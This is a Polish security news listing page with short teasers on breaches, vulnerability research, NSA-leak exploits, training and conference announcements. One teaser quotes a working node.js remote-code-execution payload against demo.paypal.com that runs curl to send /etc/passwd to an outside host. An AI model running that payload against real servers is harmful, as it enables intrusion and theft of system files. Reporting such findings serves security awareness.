W USA aresztowano 27-latka, któremu postawiono zarzuty shackowania w sumie 4 serwerów należących do Linux Kernel Organization: he is alleged to have gained unauthorized access to the four servers by using the credentials of an individual associated with the Linux Kernel Organization. According to the indictment, Austin used that access…
Czytaj dalej »
Kilka ciekawych wpisów (z dostępnym kodem w pythonie) pokazujących jak automatycznie namierzać ciekawe zasoby w darkwebie – od mapowania kluczy publicznych ssh, przez wykorzystanie shodana, skanowanie domen .onion, po wizualiację: Z ciekawostek, autor przygotował też choćby skrypty w pythonie, robiące OSINT już w normalnym webie – np. wykrywające zdjęcia…
Czytaj dalej »
W tym numerze, z naszej strony Michał Bentkowski dzieli się tekstem o tym, jak w prosty i niedrogi sposób szybko zwiększyć bezpieczeństwo swojej aplikacji webowej. Sami wydawcy z kolei piszą tak: Jubileuszowe pięćdziesiąte wydanie „Programisty” jest wydaniem rozszerzonym, co oznacza, że w tym miesiącu znajdziecie w nim jeszcze więcej artykułów…
Czytaj dalej »
Dzisiaj krótko – o samym szkoleniu z bezpieczeństwa frontendu aplikacji webowych pisaliśmy niedawno… Co poskutkowało tym, że na najbliższą edycję we wrześniu jest już pełna grupa. Kolejne terminy mamy ogłoszone na początek listopada (Kraków) i grudzień (Warszawa), jeśli chcielibyście inne miasta lub może interesowałoby Was szkolenie zamknięte (w siedzibie firmy,…
Czytaj dalej »
Od Organizatorów: Codemotion to jedna z największych konferencji technicznych w Europie. W tym roku w dniach 15-16 września zawita również w Polsce jako Codemotion Warsaw. Przez dwa dni na ekranach kina Atlantic w Warszawie będzie można zobaczyć prezentacje o tematach takich jak Web development, Big Data, DevOps, IoT/IoE, Design, Cloud,…
Czytaj dalej »
Jakiś czas temu pisaliśmy o podatności Rowhammer, ale wiele badaczy stwierdziło że ataku się nie da przeprowadzić w kontrolowany sposób w praktyce. Okazuje się jednak, że praktyczne ataki tego typu jak najbardziej są możliwe i wykorzystuje też opisywany przez nas swego czasu atak kryptograficzny Bit-Flipping: We introduce Flip Feng Shui (FFS), a…
Czytaj dalej »
Ciekawy research z Izraela, pokazujący jak można wysyłać dane z komputera, który jest fizycznie odseparowany od innych sieci. Całość polega na wykorzystaniu odpowiedniego oprogramowania, które potrafi z niemodyfikowanego pendrajwa zrobić nadajnik radiowy. Projekt działa na relatywnie niewielkie odległości i udało się osiągnąć prędkość transmisji rzędu 20-80 bajtów na sekundę. Przykładową instalację…
Czytaj dalej »
Zapraszam na listopadową konferencję PolCAAT, nad którą sekurak objął patronat. Również będzie tam moja prezentacja dotycząca hackowania sprzętu. Jak dobrze pójdzie zobaczycie na żywo hackowanie CCTV – to jeden z efektów które będę chciał pokazać na jednym z bardziej enterprajsowych dostawców kamer: Całość organizuje Instytut Audytorów Wewnętrznych IIA Polska, a…
Czytaj dalej »
Kolejny trup znaleziony w szafie po hacku teamu NSA. Tym razem chodzi o możliwość wysłania nieuwierzytelnionych pakietów protokołu IKE (wykorzystywanego w IPsec) w celu uzyskania zrzutów pamięci z urządzenia Cisco PIX.
Czytaj dalej »
O problemach bezpieczeństwa w node.js pisaliśmy już jakiś czas temu. Teraz świeży bug umożliwiający wykonanie kodu w os na demo.paypal.com. Tym razem udało się znaleźć problem przy okazji fuzzingu w burpie: Finalnie exploit okazał się w miarę prosty (wysłanie /etc/passwd do serwera atakującego): https://demo.paypal.com/demo/navigation?device[]=x&device[]=y’-require(’child_process’).exec(’curl+-F+”x=`cat+/etc/passwd`”+artsploit.com’)-’ –Michał Sajdak
Czytaj dalej »
Tym razem bohaterem jest router przywieziony z Chin: Rzadko zdarzają się tak dokładne analizy różnych problemów bezpieczeństwa na urządzeniach sieciowych – tym razem mamy dostęp m.in. dostęp do roota przez podanie odpowiedniej nazwy ciastka + eskalację poprzez wstrzyknięcie do wykonania traceroute. Z ciekawostek – w routerze jest zainstalowany privoxy, potrafiący pozytywnie…
Czytaj dalej »
Dostępne w PDF, są i bardziej techniczne i bardziej ogólne (z dużym wstępem dotyczącym np. analizy ryzyka). Idealne dla osób, które chciałyby wejść w tematykę testów penetracyjnych lub doświadczonych pentesterów (zawsze coś można podpatrzeć, no nie? ;-) –ms
Czytaj dalej »
Nie tylko Cisco ale również inni producenci łatają się po ostatnim wycieku ze skackowania NSA. Fortigate zapatchował właśnie w swoich starszych produktach buffer overflow w… parserze ciasteczek. Podatność umożliwia zdalnie otrzymanie uprawnień admina, i oznaczona została priorytetem High. Prawdopodobnie do wykorzystania podatności wystarczy nieuwierzytelniony dostęp do interfejsu webowego urządzenia. Cisco też nie pozostaje…
Czytaj dalej »
Tego jeszcze chyba nie było ;) Jak wprowadzić w przeglądarce adres, który dla użytkownika będzie wyglądał mało podejrzanie, np. w pasku URL mamy: google.com/blablabla, ale przeglądarka wykonuje komunikację do innego niż Google adresu IP? Można to wymusić za pomocą kodowania znanego np. w j. arabskim (czytamy tam od prawej do lewej)….
Czytaj dalej »
Wczoraj pisaliśmy o wycieku z grupy hackerskiej powiązanej z NSA, a tymczasem dostępny jest opis działania jednego z exploitu, udostępnionego bezpłatnie w ramach dema. Nie jest to jakaś wywracająca świat rzecz (ta jest :) , ale przy znajomości community string (można próbować też użyć domyślnego) do SNMP można zalogować się…
Czytaj dalej »